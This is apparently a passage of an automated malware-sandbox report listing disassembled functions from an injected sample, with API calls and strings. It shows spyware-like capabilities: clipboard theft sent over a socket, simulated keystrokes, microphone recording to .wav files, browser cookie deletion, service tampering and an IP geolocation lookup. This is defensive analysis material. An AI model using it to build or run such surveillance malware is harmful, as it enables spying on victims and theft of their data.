                                                                                                    • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                                                                                    • Opcode Fuzzy Hash: 2e3600b746fe9ac87d59e0b6531a88c852240b79fdaa103bb46f95523c215d20
                                                                                                    • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                                                                                    APIs
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InputSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3431551938-0
                                                                                                    • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                                    • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                                                                                    • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                                    • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32 ref: 00414F41
                                                                                                    • EmptyClipboard.USER32 ref: 00414F4F
                                                                                                    • CloseClipboard.USER32 ref: 00414F55
                                                                                                    • OpenClipboard.USER32 ref: 00414F5C
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                                    • CloseClipboard.USER32 ref: 00414F84
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2172192267-0
                                                                                                    • Opcode ID: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                                                    • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                                                                                    • Opcode Fuzzy Hash: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                                                    • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                                                    • __fassign.LIBCMT ref: 00447814
                                                                                                    • __fassign.LIBCMT ref: 0044782F
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                                                    • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                                    • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                                                                                    • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                                    • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                                                                                    APIs
                                                                                                    • _strftime.LIBCMT ref: 00401D30
                                                                                                      • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                                    • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                                                    • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                                                    • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                    • API String ID: 3809562944-3597965672
                                                                                                    • Opcode ID: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                                                    • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                                                                                    • Opcode Fuzzy Hash: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                                                    • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                                      • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                                      • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                    • Opcode ID: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                                                    • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                                                                                    • Opcode Fuzzy Hash: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                                                    • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72f55132905b5c5cac36f6f5b804992b9b83d0bf5d0ec38d0ac4b9fa9f9bedd6
                                                                                                    • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                                                                                    • Opcode Fuzzy Hash: 72f55132905b5c5cac36f6f5b804992b9b83d0bf5d0ec38d0ac4b9fa9f9bedd6
                                                                                                    • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                                                    Strings
                                                                                                    • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                    • API String ID: 3121278467-91888290
                                                                                                    • Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                                                    • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                                                                                    • Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                                                    • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                                                    • _free.LIBCMT ref: 0044E128
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 0044E133
                                                                                                    • _free.LIBCMT ref: 0044E13E
                                                                                                    • _free.LIBCMT ref: 0044E192
                                                                                                    • _free.LIBCMT ref: 0044E19D
                                                                                                    • _free.LIBCMT ref: 0044E1A8
                                                                                                    • _free.LIBCMT ref: 0044E1B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                                    • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                                                                                    • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                                    • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                                                    • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                                    • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                                                                                    • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                                    • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                                                    • GetLastError.KERNEL32 ref: 0040AA28
                                                                                                    Strings
                                                                                                    • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                                                    • UserProfile, xrefs: 0040A9EE
                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                                                    • [Chrome Cookies not found], xrefs: 0040AA42
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                    • API String ID: 2018770650-304995407
                                                                                                    • Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                                                    • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                                                                                    • Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                                                    • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00438A09
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                                                    • __allrem.LIBCMT ref: 00438A3C
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                                                    • __allrem.LIBCMT ref: 00438A71
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                                                    • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                                                                                    • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                                                    • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe
                                                                                                    • String ID:
                                                                                                    • API String ID: 4189289331-0
                                                                                                    • Opcode ID: e77b89ec647beea08f999f44c75a4a75475862982b5607e494a6c83f3e04462b
                                                                                                    • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                                                                                    • Opcode Fuzzy Hash: e77b89ec647beea08f999f44c75a4a75475862982b5607e494a6c83f3e04462b
                                                                                                    • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __freea$__alloca_probe_16_free
                                                                                                    • String ID: a/p$am/pm
                                                                                                    • API String ID: 2936374016-3206640213
                                                                                                    • Opcode ID: edbfd9b26f64bdcefc65dcd5331f404a11602e4a83eff6bc4fab17996535e92b
                                                                                                    • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                                                                                    • Opcode Fuzzy Hash: edbfd9b26f64bdcefc65dcd5331f404a11602e4a83eff6bc4fab17996535e92b
                                                                                                    • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                                                    • int.LIBCPMT ref: 0040F8D7
                                                                                                      • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                                      • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3815856325-0
                                                                                                    • Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                                                    • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                                                                                    • Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                                                    • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                    • String ID:
                                                                                                    • API String ID: 493672254-0
                                                                                                    • Opcode ID: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                                                    • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                                                                                    • Opcode Fuzzy Hash: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                                                    • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                    • _free.LIBCMT ref: 0044575C
                                                                                                    • _free.LIBCMT ref: 00445784
                                                                                                    • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                                    • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                    • _abort.LIBCMT ref: 004457A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                                    • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                                                                                    • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                                    • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                    • String ID:
                                                                                                    • API String ID: 221034970-0
                                                                                                    • Opcode ID: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                                                    • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                                                                                    • Opcode Fuzzy Hash: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                                                    • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                    • String ID:
                                                                                                    • API String ID: 221034970-0
                                                                                                    • Opcode ID: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                                                    • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                                                                                    • Opcode Fuzzy Hash: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                                                    • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                    • String ID:
                                                                                                    • API String ID: 221034970-0
                                                                                                    • Opcode ID: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                                                    • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
